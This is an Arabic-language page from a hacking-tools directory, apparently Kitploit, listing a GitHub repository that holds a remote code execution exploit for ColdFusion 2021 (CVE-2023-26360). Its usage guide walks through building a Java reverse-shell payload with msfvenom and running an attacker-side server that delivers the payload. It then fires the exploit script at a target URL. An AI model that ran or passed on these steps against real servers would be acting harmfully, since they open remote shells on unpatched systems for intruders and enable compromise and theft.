Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

استغلال لتنفيذ التعليمات البرمجية عن بُعد في ColdFusion 2021 (CVE-2023-26360)

عرض المستودع
1منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-26360 - تنفيذ الأكواد عن بُعد على ColdFusion 2021

في بعض الأحيان، لا تعمل السكربتات من المحاولة الأولى. جرّب عدة مرات حتى تنجح

كيفية التنفيذ

إنشاء الحمولة باستخدام msfvenom

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

تشغيل server.py

  • سيرسل هذا الخادم الحمولة إلى خادم Coldfusion بعد الوصول الأولي باستخدام cve.2023-26360.py، لذا يجب تشغيله أولاً.
root@kitploit:~
python3 server.py 8000
  • الوسيط 8000 هو المنفذ الذي سيستمع عليه الخادم.

  • من المهم ملاحظة أن السطر 12 يضبط عنوان IP الخاص بالخادم، لذا قم بتغييره:

root@kitploit:~
s.bind(('192.168.56.1',port))

تشغيل cve-2023-26360.py

  • لتشغيل الاستغلال، نفّذ:
root@kitploit:~
python3 cve-2023-26360.py 8000
  • كما في server.py، الوسيط 8000 هو المنفذ الذي سيستمع عليه server.py. لذا يجب أن يكون نفسه في كلا الأمرين.

  • يحدد السطر 8 في cve-2023-26360.py عنوان IP الذي سيستمع عليه server.py. من الضروري تكوينه بشكل صحيح.

  • يحدد السطر 11 في cve-2023-26360.py عنوان IP الخاص بخادم coldfusion، لذا قم بتغييره:

root@kitploit:~
url = "http://192.168.56.102:8500"

تم الاختبار على

  • ColdFusion 2021 - Windows Server 2019
تنزيل الأداة